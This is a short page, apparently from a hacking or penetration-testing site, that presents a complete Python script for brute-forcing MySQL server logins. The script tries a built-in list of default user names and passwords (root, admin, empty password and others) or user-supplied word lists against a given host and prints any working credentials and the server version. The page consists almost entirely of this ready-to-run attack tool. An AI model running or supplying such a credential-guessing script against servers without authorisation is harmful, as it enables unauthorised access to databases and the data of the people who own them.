Going up against MySQL

Tools for going against MySQL

MySQL Scanner

Here is a Python-based scanner that checks a MySQL server for default credentials, or uses a supplied user word list and password list to brute-force the login.

import MySQLdb
import sys 
 
# Candidate user names and passwords; the main program below fills these in
# from the built-in defaults or from the word list files given on the command line.
user_list, pass_list = [], []
 
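def mysql_connect(u, p, ip):
    """Try one MySQL login and report the outcome on stdout.

    Args:
        u: User name to authenticate as.
        p: Password to try (may be the empty string).
        ip: Host name or address of the MySQL server.

    Returns:
        None when the attempt fails. A successful attempt never returns:
        the credentials and server version are printed and the process
        exits with status 0.

    Each call is one complete login attempt with a 5 second connect
    timeout, so the target server sees (and can log) every failure.
    The output contains the password in clear text; treat captured
    terminal output or redirected logs accordingly.
    """
    print("[+] Attempting Connection...")
    try:
        db = MySQLdb.connect(user=u, passwd=p, host=ip, connect_timeout=5)
    except Exception as err:
        # 1045 is the MySQL server's "access denied" error number. Anything
        # else (unreachable host, timeout, refused connection, ...) is not an
        # authentication result and must not be reported as one, otherwise
        # the scan output says "Access denied" for a server that never
        # answered.
        if err.args[:1] == (1045,):
            print("Access denied\n")
        else:
            print("Connection failed: %s\n" % (err,))
        print("%s  |  %s" % (u, p))
        print(ip)
        return

    # Read the version string first and always release the connection, even
    # if the lookup fails, so a working login is never left open or
    # misreported as a denial.
    try:
        server_info = db.get_server_info()
    except Exception as err:
        server_info = "unavailable (%s)" % (err,)
    finally:
        db.close()

    print("[+] Connection Successful!\n")
    print("[+] ----------------------------------------")
    print("[+] Username:  %s   Password:  %s" % (u, p))
    print("[+] IP:  %s" % (ip,))
    print("[+] Server Info:  %s" % (server_info,))
    print("[+] ----------------------------------------")
    print("[-] Connection Closed\n")
    # Stop at the first working pair; sys.exit is used instead of the
    # site-provided exit() helper, which is not guaranteed to exist.
    sys.exit(0)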
 
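# Begin main program
print("")
print("+--------------------+")
print("| MySQL Scanner v1.0 |")
print("| Written by Damian  |")
print("+--------------------+")


def _read_wordlist(path):
    """Return the entries of the file at *path*, one per line, without line endings."""
    # Only the line terminator is removed. Without this every entry keeps its
    # trailing newline and can never match a real account. Inner spaces and
    # empty lines are kept, because an empty password is a valid candidate.
    # The with-block closes the file even if reading fails.
    with open(path, 'r') as handle:
        return [line.rstrip("\r\n") for line in handle]


if len(sys.argv) == 2:
    # Host only: fall back to a short list of common default credentials.
    print("[+] Setting up default credentials list\n")
    user_list = ["admin", "administrator", "root"]
    pass_list = ["password", "admin", "", "locked"]

elif len(sys.argv) == 4:
    # Host plus two files: one user name per line, one password per line.
    print("[+] Building word list\n")
    user_list = _read_wordlist(sys.argv[2])
    print("[+] Building password list\n")
    pass_list = _read_wordlist(sys.argv[3])

else:
    print("\nUsage:")
    print("\tsql_scanner.py [host]")
    print("\tsql_scanner.py [host] [word_list] [password_list]\n")
    sys.exit(0)

ip_address = str(sys.argv[1])

# Every user/password pair is tried in turn, so the server receives up to
# len(user_list) * len(pass_list) login attempts. mysql_connect() exits the
# process on the first success, so the final message is only reached when no
# pair was accepted.
for x in user_list:
    for y in pass_list:
        mysql_connect(x, y, ip_address)

print("Scan Complete\n")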

Submitted by Damian
